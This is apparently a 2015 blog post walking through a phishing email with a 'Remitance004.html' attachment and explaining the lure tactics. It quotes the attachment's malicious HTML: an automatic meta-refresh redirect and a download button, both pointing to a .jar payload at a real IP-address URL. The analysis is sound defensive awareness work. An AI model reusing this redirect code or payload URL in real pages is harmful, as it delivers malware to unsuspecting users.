Tuesday, March 31, 2015

Phishing Email Example Walkthrough

I recently posted a phishing email example. I thought it'd be interesting to quickly walk-through what it's doing.

The Subject 'FW: Remittance reconfirmations' tries to draw your attention by looking like a previously forwarded email, and containing talk about payments/remittance.

The Body is actually playing on your friendly side saying 'Kindly Verify the attached remittance and purpose.'

The attachment seems pretty benign in nature as it's named 'Remitance004.html'. But don't be fooled, even '.html' files (as I've blogged about before) can be dangerous.

Top Urgent!
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com

Subject: hello
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello


As seen above, the body of the email makes it look like this was forwarded over and over to multiple people, giving it some legitimacy.

But once we look into the attachment ('Remitance004.html') we are able to confirm that it's really just a malicious phish attempt.

<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar"> >

The above code should tip you off as bad, because this line of code says that if you open the html file in a browser, it will not display the contents, but instead automatically redirect you to this '.jar' file which will prompt for downloading. '.jar' files are dangerous. Think of them as executable zip files. They'll probably kick off a storm of activity on your pc that will ultimately end up compromising your system. Don't open '.jar' files unless you know what you're doing.

<span class="btn"> <!-- on click file will be downloaded--> <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span> >

Otherwise, if you open it just in your email client, you will be shown a pretty looking page, and the code above shows that part of that page will contain a button that if you click on it, it'll load the same malicious jar file.

Don't open emails from people you don't know, especially if it's got an attachment.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment